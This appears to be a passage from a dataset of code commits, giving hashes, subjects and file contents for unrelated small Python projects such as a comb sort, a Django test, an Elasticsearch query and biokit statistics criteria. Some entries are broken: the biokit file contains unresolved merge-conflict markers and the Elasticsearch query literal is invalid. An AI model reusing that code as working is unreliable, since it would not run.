commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
72f9d74fe6503de45e7251460d5419eebcabfb7e | Add files via upload | ScottHull/Exoplanet-Pocketknife | old/hefesto_temp_fix.py | old/hefesto_temp_fix.py | import os
def replace_temp(inputfile_folder):
os.chdir(inputfile_folder)
home_dir = os.getcwd()
for i in os.listdir(os.getcwd()):
if os.path.isdir(i):
os.chdir(i)
print("In folder: {}".format(os.getcwd()))
for z in os.listdir(os.getcwd()):
if '.txt' in z:
with open(z, 'r') as infile:
with open("temp.txt", 'w') as outfile:
print("\nChanging string in file: {}".format(z))
infile_text = infile.read()
s = infile_text.replace(",20,80,1200,0,-2,0", "0,20,80,1600,0,-2,0")
outfile.write(s)
os.remove(z)
os.rename("temp.txt", z)
infile.close()
print("Success! Replaced string in file: {}".format(z))
os.chdir(home_dir)
def initialization():
print("\n\n\n\nPlease specify your HeFESTo input file folder (in Exoplanet Pocketknife format):")
in1 = input("\n>>> ")
if in1 in os.listdir(os.getcwd()):
replace_temp(inputfile_folder=in1)
else:
initialization()
initialization() | cc0-1.0 | Python |
|
816872186966186eb463d1fd45bea3a4c6f68e00 | Add new sanity test for demoproject views | pgollakota/django-chartit,pgollakota/django-chartit,pgollakota/django-chartit | demoproject/tests_demo.py | demoproject/tests_demo.py | from demoproject.urls import urlpatterns
from django.test import Client, TestCase
class DemoProject_TestCase(TestCase):
def setUp(self):
self.client = Client()
def test_all_views_load(self):
"""
A simple sanity test to make sure all views from demoproject
still continue to load!
"""
for url in urlpatterns:
address = url._regex
if address.startswith('^'):
address = '/' + address[1:]
if address.endswith('$'):
address = address[:-1]
response = self.client.get(address)
self.assertEqual(response.status_code, 200)
| bsd-2-clause | Python |
|
2cdf9728bd185fa7a32e4a7f758311594245fae0 | Add proc_suffixes_file.py | daineseh/python_code | file_path/proc_suffixes_file.py | file_path/proc_suffixes_file.py | #!/usr/bin/env python
import os
import re
import sys
SUFFIX_PAT = re.compile(r'(?P<FILE>[a-zA-z0-9]+)_\d+\b')
SUFFIXED_LIST = []
def is_suffixed_file(dir_path, file_name):
base_name, ext_name = os.path.splitext(file_name)
match_obj = SUFFIX_PAT.match(base_name)
if not match_obj:
return False
no_suffixed_file = os.path.join(dir_path, match_obj.group('FILE') + ext_name)
if not os.path.exists(no_suffixed_file):
return False
return True
def collect_suffixed_file(dir_path, file_name):
if not is_suffixed_file(dir_path, file_name):
return
suffix_file = os.path.join(dir_path, file_name)
SUFFIXED_LIST.append(suffix_file)
def remove_files():
if not SUFFIXED_LIST:
print 'No suffixes file.'
return
SUFFIXED_LIST.sort()
for name in SUFFIXED_LIST:
print name
input_str = raw_input('Do you want to remove this files: [Y/N]')
if input_str.upper() != 'Y':
return
for name in SUFFIXED_LIST:
try:
os.remove(name)
print '%s removed.' % name
except OSError, e:
print e
def main():
if len(sys.argv) < 2:
print 'Please a directory.'
return
if not os.path.isdir(sys.argv[1]):
print 'Please input valid path - %s' % sys.argv[1]
return
for dir_path, dir_list, file_list in os.walk(sys.argv[1]):
for file_name in file_list:
collect_suffixed_file(dir_path, file_name)
remove_files()
if __name__ == '__main__':
main()
| mit | Python |
|
286c9c8a6618fc0a87dbe1b50787331986155940 | Create __init__.py | scienceopen/airtools,scienceopen/pyAIRtools,scienceopen/airtools | __init__.py | __init__.py | bsd-3-clause | Python |
||
959aecd612f66eee22e179f985227dbb6e63202a | Move buckling calcs to continuum_analysis | dashdotrobot/bike-wheel-calc | __init__.py | __init__.py | from abaqus_model import *
from abaqus_postproc import *
from continuum_analysis import *
from rayleighritz import RayleighRitzDiscrete
from stiffcalc import *
| mit | Python |
|
6d2735035d7230e6a709f66be93b760531a42868 | Create __init__.py | gldmt-duke/CokerAmitaiSGHMC,gldmt-duke/CokerAmitaiSGHMC | __init__.py | __init__.py | mit | Python |
||
662b0754ea73ef9dc19c50ac8d9b3e2aaa7fbb02 | Create __init__.py | agitatedgenius/redbot,bhagirathbhard/redbot | __init__.py | __init__.py | mit | Python |
||
05a6080eed951f80da3b6f7ee4962101884f328e | add testing utility for checking term lookback windows | quantopian/zipline,humdings/zipline,humdings/zipline,quantopian/zipline | zipline/pipeline/factors/testing.py | zipline/pipeline/factors/testing.py | import numpy as np
from zipline.testing.predicates import assert_equal
from .factor import CustomFactor
class IDBox(object):
"""A wrapper that hashs to the id of the underlying object and compares
equality on the id of the underlying.
Parameters
----------
ob : any
The object to wrap.
Attributes
----------
ob : any
The object being wrapped.
Notes
-----
This is useful for storing non-hashable values in a set or dict.
"""
def __init__(self, ob):
self.ob = ob
def __hash__(self):
return id(self)
def __eq__(self, other):
if not isinstance(other, IDBox):
return NotImplemented
return id(self.ob) == id(other.ob)
class CheckWindowsFactor(CustomFactor):
"""A custom factor that makes assertions about the lookback windows that
it gets passed.
Parameters
----------
input_ : Term
The input term to the factor.
window_length : int
The length of the lookback window.
expected_windows : dict[int, dict[pd.Timestamp, np.ndarray]]
For each asset, for each day, what the expected lookback window is.
Notes
-----
The output of this factor is the same as ``Latest``. Any assets or days
not in ``expected_windows`` are not checked.
"""
params = ('expected_windows',)
def __new__(cls, input_, window_length, expected_windows):
return super(CheckWindowsFactor, cls).__new__(
cls,
inputs=[input_],
dtype=input_.dtype,
window_length=window_length,
expected_windows=frozenset(
(k, IDBox(v)) for k, v in expected_windows.items()
),
)
def compute(self, today, assets, out, input_, expected_windows):
for asset, expected_by_day in expected_windows:
expected_by_day = expected_by_day.ob
col_ix = np.searchsorted(assets, asset)
if assets[col_ix] != asset:
raise AssertionError('asset %s is not in the window' % asset)
try:
expected = expected_by_day[today]
except KeyError:
pass
else:
expected = np.array(expected)
actual = input_[:, col_ix]
assert_equal(actual, expected)
# output is just latest
out[:] = input_[-1]
| apache-2.0 | Python |
|
d3a684b06d2d61f2a498346f78a5cbbabd7828e7 | Create elastic_search.py | amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning,amitsaha/learning | misc/elastic_search.py | misc/elastic_search.py | import requests
import json
import pprint
es = 'http://hostt:9200/'
query = '''
{'fields': ['field1', 'field2',],
'filter': {'bool': {'must': [{'terms': {'field1': [1,
2]}},
{'bool': {'should': [{'term': {'field2': 'p'}},
{'bool': {'must': [{'term': {'field3': 'interesting'}},
]
}
}
]
}
}
]
}
}
'from': 0,
'query': {'match_all': {}},
'size': 100,
'search_type: 'scan',
}
index = '/index-name'
method = '/_search'
payload = json.dumps(query)
res = requests.get(es + index + method, data=payload)
pprint.pprint(res.json())
| unlicense | Python |
|
7bf376c57cc989f382f6a1cdc6a5f956b2c73fd6 | Add pixels_with_value() | ronrest/convenience_py,ronrest/convenience_py | ml/img/segmentation.py | ml/img/segmentation.py | import numpy as np
def pixels_with_value(img, val):
return np.all(img==np.array(val), axis=2)
| apache-2.0 | Python |
|
13c40d631c5d0e6035ea143a68e45201691b46a5 | Create 0303_restaurant_plural_foods.py | boisvert42/npr-puzzle-python | 2019/0303_restaurant_plural_foods.py | 2019/0303_restaurant_plural_foods.py | # -*- coding: utf-8 -*-
"""
NPR 2019-03-03
https://www.npr.org/2019/03/03/699735287/sunday-puzzle-in-this-game-a-chance-to-claim-vic-tor-y
Name a popular restaurant chain in two words.
Its letters can be rearranged to spell some things to eat and some things to drink.
Both are plural words. What things are these, and what's the chain?
"""
import sys
sys.path.append('..')
import nprcommontools as nct
import json
#%%
# Get a list of restaurants
restaurants = nct.wikipedia_category_members('Restaurant_chains_in_the_United_States',3)
# Two-word restaurants
good_restaurants = set(x for x in restaurants if x.count(' ') == 1)
#%%
# Food and drink are both under the category 'food' in Wordnet
food_and_drink = nct.get_category_members('food')
#%%
# Get plurals of foods
with open(r'../plurals.json','r') as fid:
plurals1 = json.load(fid)
plurals = set()
for word,pls in plurals1.items():
if word in food_and_drink:
for pl in pls:
plurals.add(pl)
#%%
# All sorted strings consisting of two plurals
plural_dict = dict()
plurals_list = list(plurals)
for i in range(len(plurals_list)):
for j in range(i+1,len(plurals_list)):
plural_dict[nct.sort_string(nct.alpha_only(plurals_list[i]+plurals_list[j]))] = (plurals_list[i],plurals_list[j])
#%%
for r in good_restaurants:
r_sorted = nct.sort_string(nct.alpha_only(r.lower()))
if r_sorted in plural_dict:
print(r,plural_dict[r_sorted])
| cc0-1.0 | Python |
|
bfdac16ca4e0ae30e345b221c7754f19669a55da | update full version of criteria module. | biokit/biokit,biokit/biokit | biokit/stats/criteria.py | biokit/stats/criteria.py | <<<<<<< HEAD
# -*- coding: utf-8 -*-
import math
__all__ = ['AIC', 'AICc', 'BIC']
def AIC(L, k):
"""Return Akaike information criterion (AIC)
:param int k: number of parameters
:param float L: maximised value of the likelihood function
Suppose that we have a statistical model of some data, from which we computed
its likelihood function and let k be the number of parameters in the model
(i.e. degrees of freedom). Then the AIC value is ::
:math:`\mathrm{AIC} = 2k - 2\ln(L)`
Given a set of candidate models for the data, the preferred model is the one
with the minimum AIC value. Hence AIC rewards goodness of fit (as assessed
by the likelihood function), but it also includes a penalty that is an
increasing function of the number of estimated parameters. The penalty
discourages overfitting.
Suppose that there are R candidate models AIC1, AIC2, AIC3, AICR.
Let AICmin be the minimum of those values. Then, exp((AICmin - AICi)/2)
can be interpreted as the relative probability that the ith model
minimizes the (estimated) information loss.
Suppose that there are three candidate models, whose AIC values are 100,
102, and 110. Then the second model is exp((100 - 102)/2) = 0.368 times
as probable as the first model to minimize the information loss. Similarly,
the third model is exp((100 - 110)/2) = 0.007 times as probable as
the first model, which can therefore be discarded.
With the remaining two models, we can (1) gather more data, (2) conclude
that the data is insufficient to support selecting one model from among
the first two (3) take a weighted average of the first two models,
with weights 1 and 0.368.
The quantity exp((AICmin - AICi)/2) is the relative likelihood of model i.
If all the models in the candidate set have the same number of parameters,
then using AIC might at first appear to be very similar to using the
likelihood-ratio test. There are, however, important distinctions.
In particular, the likelihood-ratio test is valid only for nested models,
whereas AIC (and AICc) has no such restriction.
Reference: Burnham, K. P.; Anderson, D. R. (2002), Model Selection and
Multimodel Inference: A Practical Information-Theoretic Approach (2nd ed.),
Springer-Verlag, ISBN 0-387-95364-7.
"""
return 2*k -2 * math.log(L)
def AICc(L, k, n):
"""AICc criteria
:param int k: number of parameters
:param int n: sample size
:param float L: maximised value of the likelihood function
AIC with a correction for finite sample sizes.
The formula for AICc depends upon the statistical model.
Assuming that the model is univariate, linear, and has normally-distributed
residuals (conditional upon regressors), the formula for AICc is as follows:
AICc is essentially AIC with a greater penalty for extra parameters.
Using AIC, instead of AICc, when n is not many times larger than k2, increases
the probability of selecting models that have too many parameters, i.e. of
overfitting. The probability of AIC overfitting can be substantial, in some cases.
"""
res = AIC(L, k) + 2*k*(k+1.) / (n-k-1.)
return res
def BIC(L, k, n):
"""Bayesian information criterion
Given any two estimated models, the model with the lower value of BIC is the one to be preferred.
"""
res = -2 * math.log(L) + k * (math.log(n) - math.log(2 * math.pi))
# For large n
#res = -2 * math.log(L) + k * math.log(n)
return res
=======
import math
def AIC(L, k):
return 2*k - 2 * math.log(L)
def AICc(L, k, n):
return AIC(L, k) + 2*k*(k+1.)/(n-k-1.)
def BIC(L, k, n):
return -2 * math.log(L) + k * (math.log(n) - math.log(2*math.pi))
>>>>>>> 514a04b5ffa7c9e3ede068c860933e9a404e6063
| bsd-2-clause | Python |
|
ed46c3887c7b51cd75d46523af7b901b79eb92fc | add import script for Milton Keynes (closes #863) | chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations,chris48s/UK-Polling-Stations,DemocracyClub/UK-Polling-Stations | polling_stations/apps/data_collection/management/commands/import_milton_keynes.py | polling_stations/apps/data_collection/management/commands/import_milton_keynes.py | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = 'E06000042'
addresses_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017 (1).tsv'
stations_name = 'parl.2017-06-08/Version 1/Democracy_Club__08June2017 (1).tsv'
elections = ['parl.2017-06-08']
csv_delimiter = '\t'
| bsd-3-clause | Python |
|
4f042e64e3155abfc4b86f61623a4d999dad0f89 | Move tinyHttpServer.py | amsehili/genRSS | tinyHttpServer.py | tinyHttpServer.py | import SimpleHTTPServer
import SocketServer
PORT = 8080
try:
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print("serving at port %d" % (PORT))
print("Type Ctrl+C to quit")
httpd.serve_forever()
except KeyboardInterrupt as e:
print("\nserver stopped\nBye...")
| mit | Python |
|
5fb6b31ea928162c5185d66381ae99c7454d33c0 | Add comb sort algorithm | TheAlgorithms/Python | sorts/comb_sort.py | sorts/comb_sort.py | """
Comb sort is a relatively simple sorting algorithm originally designed by Wlodzimierz Dobosiewicz in 1980.
Later it was rediscovered by Stephen Lacey and Richard Box in 1991. Comb sort improves on bubble sort.
This is pure python implementation of counting sort algorithm
For doctests run following command:
python -m doctest -v comb_sort.py
or
python3 -m doctest -v comb_sort.py
For manual testing run:
python comb_sort.py
"""
def comb_sort(data):
"""Pure implementation of comb sort algorithm in Python
:param collection: some mutable ordered collection with heterogeneous
comparable items inside
:return: the same collection ordered by ascending
Examples:
>>> comb_sort([0, 5, 3, 2, 2])
[0, 2, 2, 3, 5]
>>> comb_sort([])
[]
>>> comb_sort([-2, -5, -45])
[-45, -5, -2]
"""
shrink_factor = 1.3
gap = len(data)
swapped = True
i = 0
while gap > 1 or swapped:
# Update the gap value for a next comb
gap = int(float(gap) / shrink_factor)
swapped = False
i = 0
while gap + i < len(data):
if data[i] > data[i+gap]:
# Swap values
data[i], data[i+gap] = data[i+gap], data[i]
swapped = True
i += 1
return data
if __name__ == '__main__':
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
user_input = raw_input('Enter numbers separated by a comma:\n').strip()
unsorted = [int(item) for item in user_input.split(',')]
print(comb_sort(unsorted))
| mit | Python |
|
2ed853301e8cedb72c7c07367d58e55cac23aa7c | add PI to arduino | winlinvip/raspi-tools,winlinvip/raspi-tools | raspi-pl2303.py | raspi-pl2303.py | #!/usr/bin/env python
import serial
print 'RaspberryPi PL2303(USB2SerialTTL) communicate.'
print "Copyright (c) 2015 winlin([email protected])"
f = serial.Serial('/dev/ttyUSB0', 115200)
while True:
v = "Hello, Arduino, this is RaspberryPi 2.0~"
f.write(v)
print 'PI: %s'%(v)
r = ''
for i in v:
r += f.read()
print 'Arduino: %s'%(r) | mit | Python |
|
30412406b354f510a7321c3b3a159df6d7743668 | Add a database file for Loren to complete | stuy-tetrabyte/graduation-req-tracker | utils/database.py | utils/database.py | import database_setup
assert(database_setup.is_table_set_up())
# TODO: Create the stubs for database files
# Assignee: Loren
| mit | Python |
|
929abedc5f971a58dfb54b706c66548609351835 | Create fair_warning.py | py-in-the-sky/challenges,py-in-the-sky/challenges,py-in-the-sky/challenges | google-code-jam/fair_warning.py | google-code-jam/fair_warning.py | """
https://code.google.com/codejam/contest/433101/dashboard#s=p1
"""
def gcd(a, b):
if b > a:
return gcd(b, a)
elif b == 0:
return a
else:
return gcd(b, a % b)
def big_gcd(a):
return reduce(lambda x,y: gcd(x, y), a)
def solve(nums):
nums = sorted(nums)
diffs = [(nums[i] - nums[i-1]) for i in xrange(1, len(nums))]
T = big_gcd(diffs)
n = nums[0]
return 0 if n % T == 0 else T - (n % T)
def main():
C = int(raw_input())
for c in xrange(1, C+1):
nums = map(int, raw_input().strip().split())
print 'Case #{}: {}'.format(c, solve(nums[1:]))
if __name__ == '__main__':
main()
| mit | Python |
|
b7a019b41cbfac78ff48fe604d401921786d7459 | Add size_continuous_layer helper tests | CartoDB/cartoframes,CartoDB/cartoframes | test/viz/helpers/test_size_continuous_layer.py | test/viz/helpers/test_size_continuous_layer.py | import unittest
from unittest.mock import Mock
from cartoframes.viz import helpers, Source
class TestSizeContinuousLayerHelper(unittest.TestCase):
def test_helpers(self):
"should be defined"
self.assertNotEqual(helpers.size_continuous_layer, None)
def test_size_continuous_layer(self):
"should create a layer with the proper attributes"
layer = helpers.size_continuous_layer(
source='sf_neighborhoods',
value='name'
)
self.assertNotEqual(layer.style, None)
self.assertEqual(layer.style._style['point']['width'], 'ramp(linear(sqrt($name), sqrt(globalMin($name)), sqrt(globalMax($name))), [2, 50])')
self.assertEqual(layer.style._style['line']['width'], 'ramp(linear($name), [1, 10])')
self.assertEqual(layer.style._style['point']['color'], 'opacity(#F46D43, 0.8)')
self.assertEqual(layer.style._style['line']['color'], 'opacity(#4CC8A3, 0.8)')
self.assertNotEqual(layer.popup, None)
self.assertEqual(layer.popup._hover, [{
'title': 'name',
'value': '$name'
}])
self.assertNotEqual(layer.legend, None)
self.assertEqual(layer.legend._type, 'size-continuous')
self.assertEqual(layer.legend._title, 'name')
self.assertEqual(layer.legend._description, '')
def test_size_continuous_layer_point(self):
"should create a point type layer"
layer = helpers.size_continuous_layer(
'sf_neighborhoods',
'name',
'Neighborhoods',
size=[10, 20],
color='blue'
)
self.assertEqual(
layer.style._style['point']['width'],
'ramp(linear(sqrt($name), sqrt(globalMin($name)), sqrt(globalMax($name))), [10, 20])'
)
self.assertEqual(
layer.style._style['point']['color'],
'opacity(blue, 0.8)'
)
def test_size_continuous_layer_line(self):
"should create a line type layer"
Source._get_geom_type = Mock(return_value='line')
layer = helpers.size_continuous_layer(
'sf_neighborhoods',
'name',
'Neighborhoods',
size=[10, 20],
color='blue'
)
self.assertEqual(
layer.style._style['line']['width'],
'ramp(linear($name), [10, 20])'
)
self.assertEqual(
layer.style._style['line']['color'],
'opacity(blue, 0.8)'
)
| bsd-3-clause | Python |
|
e79445de75721b0d0b8ab1b6c8e24f036bf35a11 | make qsub | Paul-St-Young/solid_hydrogen | nexus_obj/ascii_txt.py | nexus_obj/ascii_txt.py | import os
def qsub_file(fnames,nmpi=64,title='title',hours=2):
header = """#!/bin/bash
#PBS -N %s
#PBS -l walltime=0%d:00:00
#PBS -l nodes=%d
#PBS -A mat158
#PBS -j oe
#PBS -k n
cd ${PBS_O_WORKDIR}
export OMP_NUM_THREADS=8
BIN=~/soft/kylin_qmcpack/qmcpack_cpu_comp\n\n""" % (
title,
hours,
len(fnames)*nmpi/2
)
body = 'cwd=`pwd`\n'
for floc in fnames:
fname = os.path.basename(floc)
rundir = os.path.dirname(floc)
move_cmd = 'cd '+rundir
run_cmd = 'aprun -n %d -d 8 -S 1 $BIN '%nmpi + fname + ' > out 2> err&'
body += '\n'.join([move_cmd,run_cmd,'cd $cwd']) + '\n'
# end for fname
body += '\nwait'
text = header + body
return text
# end def qsub_file
| mit | Python |
|
430c5301d7db50b153b0ae33f5c281506948099c | Add new package | valsdav/plastex,valsdav/plastex,mungerd/plastex,mungerd/plastex,mungerd/plastex,mungerd/plastex,valsdav/plastex,dav94/plastex,dav94/plastex,dav94/plastex,valsdav/plastex,dav94/plastex | plasTeX/Packages/afterpage.py | plasTeX/Packages/afterpage.py | #!/usr/bin/env python
from plasTeX import Command, Environment
class afterpage(Command):
args = 'self:nox'
def invoke(self, tex):
super(afterpage, self).invoke(tex)
return []
| mit | Python |
|
b40eb5723eeab38edb2440d04d65f1c5be4ad4c0 | Create solution.py | lilsweetcaligula/Algorithms,lilsweetcaligula/Algorithms,lilsweetcaligula/Algorithms | data_structures/linked_list/problems/anagrams/py/solution.py | data_structures/linked_list/problems/anagrams/py/solution.py | import LinkedList
# Problem description:
# Solution time complexity:
# Comments:
# Linked List Node inside the LinkedList module is declared as:
#
# class Node:
# def __init__(self, val, nxt=None):
# self.val = val
# self.nxt = nxt
#
def AreAnagrams(left: LinkedList.Node, right: LinkedList.Node) -> bool:
raise NotImplementedError()
| mit | Python |
|
e9a71173eae28b378052ddce4e0fe8a3d3313c4e | Disable screenshot_sync_tests on Mac. | jaruba/chromium.src,Jonekee/chromium.src,ondra-novak/chromium.src,Just-D/chromium-1,jaruba/chromium.src,TheTypoMaster/chromium-crosswalk,littlstar/chromium.src,axinging/chromium-crosswalk,Chilledheart/chromium,markYoungH/chromium.src,mohamed--abdel-maksoud/chromium.src,fujunwei/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,Just-D/chromium-1,dednal/chromium.src,dednal/chromium.src,mohamed--abdel-maksoud/chromium.src,Fireblend/chromium-crosswalk,littlstar/chromium.src,Pluto-tv/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,PeterWangIntel/chromium-crosswalk,littlstar/chromium.src,Jonekee/chromium.src,bright-sparks/chromium-spacewalk,dednal/chromium.src,hgl888/chromium-crosswalk,hgl888/chromium-crosswalk-efl,Pluto-tv/chromium-crosswalk,chuan9/chromium-crosswalk,markYoungH/chromium.src,chuan9/chromium-crosswalk,Jonekee/chromium.src,PeterWangIntel/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,axinging/chromium-crosswalk,markYoungH/chromium.src,jaruba/chromium.src,mohamed--abdel-maksoud/chromium.src,fujunwei/chromium-crosswalk,Just-D/chromium-1,markYoungH/chromium.src,jaruba/chromium.src,TheTypoMaster/chromium-crosswalk,dushu1203/chromium.src,jaruba/chromium.src,krieger-od/nwjs_chromium.src,crosswalk-project/chromium-crosswalk-efl,hgl888/chromium-crosswalk,markYoungH/chromium.src,chuan9/chromium-crosswalk,jaruba/chromium.src,M4sse/chromium.src,PeterWangIntel/chromium-crosswalk,chuan9/chromium-crosswalk,dednal/chromium.src,hgl888/chromium-crosswalk-efl,PeterWangIntel/chromium-crosswalk,bright-sparks/chromium-spacewalk,ltilve/chromium,jaruba/chromium.src,dushu1203/chromium.src,dushu1203/chromium.src,littlstar/chromium.src,Just-D/chromium-1,krieger-od/nwjs_chromium.src,Pluto-tv/chromium-crosswalk,chuan9/chromium-crosswalk,littlstar/chromium.src,ondra-novak/chromium.src,hgl888/chromium-crosswalk-efl,axinging/chromium-crosswalk,bright-sparks/chromium-spacewalk,ondra-novak/chromium.src,crosswalk-project/chromium-crosswalk-efl,krieger-od/nwjs_chromium.src,dushu1203/chromium.src,dushu1203/chromium.src,Fireblend/chromium-crosswalk,hgl888/chromium-crosswalk-efl,M4sse/chromium.src,Chilledheart/chromium,Pluto-tv/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,ltilve/chromium,Chilledheart/chromium,ondra-novak/chromium.src,TheTypoMaster/chromium-crosswalk,Chilledheart/chromium,bright-sparks/chromium-spacewalk,ondra-novak/chromium.src,dushu1203/chromium.src,hgl888/chromium-crosswalk-efl,chuan9/chromium-crosswalk,hgl888/chromium-crosswalk-efl,Jonekee/chromium.src,jaruba/chromium.src,Chilledheart/chromium,TheTypoMaster/chromium-crosswalk,fujunwei/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,chuan9/chromium-crosswalk,Jonekee/chromium.src,dushu1203/chromium.src,crosswalk-project/chromium-crosswalk-efl,markYoungH/chromium.src,Just-D/chromium-1,ltilve/chromium,Fireblend/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,bright-sparks/chromium-spacewalk,Jonekee/chromium.src,dednal/chromium.src,bright-sparks/chromium-spacewalk,M4sse/chromium.src,ltilve/chromium,Pluto-tv/chromium-crosswalk,ondra-novak/chromium.src,fujunwei/chromium-crosswalk,axinging/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,dushu1203/chromium.src,axinging/chromium-crosswalk,axinging/chromium-crosswalk,jaruba/chromium.src,Chilledheart/chromium,dednal/chromium.src,ltilve/chromium,littlstar/chromium.src,Jonekee/chromium.src,crosswalk-project/chromium-crosswalk-efl,ltilve/chromium,Fireblend/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,axinging/chromium-crosswalk,M4sse/chromium.src,Fireblend/chromium-crosswalk,krieger-od/nwjs_chromium.src,Jonekee/chromium.src,Pluto-tv/chromium-crosswalk,ondra-novak/chromium.src,ondra-novak/chromium.src,fujunwei/chromium-crosswalk,bright-sparks/chromium-spacewalk,ltilve/chromium,axinging/chromium-crosswalk,Pluto-tv/chromium-crosswalk,hgl888/chromium-crosswalk-efl,M4sse/chromium.src,dushu1203/chromium.src,PeterWangIntel/chromium-crosswalk,krieger-od/nwjs_chromium.src,krieger-od/nwjs_chromium.src,krieger-od/nwjs_chromium.src,Just-D/chromium-1,markYoungH/chromium.src,M4sse/chromium.src,Fireblend/chromium-crosswalk,Jonekee/chromium.src,littlstar/chromium.src,PeterWangIntel/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,chuan9/chromium-crosswalk,M4sse/chromium.src,TheTypoMaster/chromium-crosswalk,Just-D/chromium-1,mohamed--abdel-maksoud/chromium.src,dushu1203/chromium.src,fujunwei/chromium-crosswalk,Fireblend/chromium-crosswalk,bright-sparks/chromium-spacewalk,markYoungH/chromium.src,mohamed--abdel-maksoud/chromium.src,Chilledheart/chromium,dushu1203/chromium.src,hgl888/chromium-crosswalk-efl,Just-D/chromium-1,M4sse/chromium.src,hgl888/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,PeterWangIntel/chromium-crosswalk,Fireblend/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,dednal/chromium.src,fujunwei/chromium-crosswalk,dednal/chromium.src,crosswalk-project/chromium-crosswalk-efl,M4sse/chromium.src,hgl888/chromium-crosswalk,Fireblend/chromium-crosswalk,axinging/chromium-crosswalk,hgl888/chromium-crosswalk,fujunwei/chromium-crosswalk,ondra-novak/chromium.src,krieger-od/nwjs_chromium.src,hgl888/chromium-crosswalk,Pluto-tv/chromium-crosswalk,markYoungH/chromium.src,M4sse/chromium.src,hgl888/chromium-crosswalk-efl,markYoungH/chromium.src,hgl888/chromium-crosswalk,chuan9/chromium-crosswalk,dednal/chromium.src,mohamed--abdel-maksoud/chromium.src,krieger-od/nwjs_chromium.src,axinging/chromium-crosswalk,krieger-od/nwjs_chromium.src,ltilve/chromium,jaruba/chromium.src,jaruba/chromium.src,hgl888/chromium-crosswalk,Jonekee/chromium.src,dednal/chromium.src,krieger-od/nwjs_chromium.src,hgl888/chromium-crosswalk,axinging/chromium-crosswalk,markYoungH/chromium.src,Jonekee/chromium.src,hgl888/chromium-crosswalk-efl,Chilledheart/chromium,fujunwei/chromium-crosswalk,ltilve/chromium,M4sse/chromium.src,Pluto-tv/chromium-crosswalk,dednal/chromium.src,littlstar/chromium.src,bright-sparks/chromium-spacewalk,Chilledheart/chromium,PeterWangIntel/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,TheTypoMaster/chromium-crosswalk,Just-D/chromium-1 | content/test/gpu/gpu_tests/screenshot_sync.py | content/test/gpu/gpu_tests/screenshot_sync.py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import screenshot_sync_expectations as expectations
from telemetry import test
from telemetry.core import util
from telemetry.page import page
from telemetry.page import page_set
from telemetry.page import page_test
# pylint: disable=W0401,W0614
from telemetry.page.actions.all_page_actions import *
data_path = os.path.join(
util.GetChromiumSrcDir(), 'content', 'test', 'data', 'gpu')
class _ScreenshotSyncValidator(page_test.PageTest):
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs('--enable-gpu-benchmarking')
def ValidatePage(self, page, tab, results):
test_success = tab.EvaluateJavaScript('window.__testSuccess')
if not test_success:
message = tab.EvaluateJavaScript('window.__testMessage')
raise page_test.Failure(message)
@test.Disabled('mac')
class ScreenshotSyncPage(page.Page):
def __init__(self, page_set, base_dir):
super(ScreenshotSyncPage, self).__init__(
url='file://screenshot_sync.html',
page_set=page_set,
base_dir=base_dir,
name='ScreenshotSync')
self.user_agent_type = 'desktop'
def RunNavigateSteps(self, action_runner):
action_runner.NavigateToPage(self)
action_runner.WaitForJavaScriptCondition(
'window.__testComplete', timeout_in_seconds=120)
class ScreenshotSyncProcess(test.Test):
"""Tests that screenhots are properly synchronized with the frame one which
they were requested"""
test = _ScreenshotSyncValidator
def CreateExpectations(self, page_set):
return expectations.ScreenshotSyncExpectations()
def CreatePageSet(self, options):
ps = page_set.PageSet(file_path=data_path, serving_dirs=[''])
ps.AddPage(ScreenshotSyncPage(ps, ps.base_dir))
return ps
| # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import screenshot_sync_expectations as expectations
from telemetry import test
from telemetry.core import util
from telemetry.page import page
from telemetry.page import page_set
from telemetry.page import page_test
# pylint: disable=W0401,W0614
from telemetry.page.actions.all_page_actions import *
data_path = os.path.join(
util.GetChromiumSrcDir(), 'content', 'test', 'data', 'gpu')
class _ScreenshotSyncValidator(page_test.PageTest):
def CustomizeBrowserOptions(self, options):
options.AppendExtraBrowserArgs('--enable-gpu-benchmarking')
def ValidatePage(self, page, tab, results):
test_success = tab.EvaluateJavaScript('window.__testSuccess')
if not test_success:
message = tab.EvaluateJavaScript('window.__testMessage')
raise page_test.Failure(message)
class ScreenshotSyncPage(page.Page):
def __init__(self, page_set, base_dir):
super(ScreenshotSyncPage, self).__init__(
url='file://screenshot_sync.html',
page_set=page_set,
base_dir=base_dir,
name='ScreenshotSync')
self.user_agent_type = 'desktop'
def RunNavigateSteps(self, action_runner):
action_runner.NavigateToPage(self)
action_runner.WaitForJavaScriptCondition(
'window.__testComplete', timeout_in_seconds=120)
class ScreenshotSyncProcess(test.Test):
"""Tests that screenhots are properly synchronized with the frame one which
they were requested"""
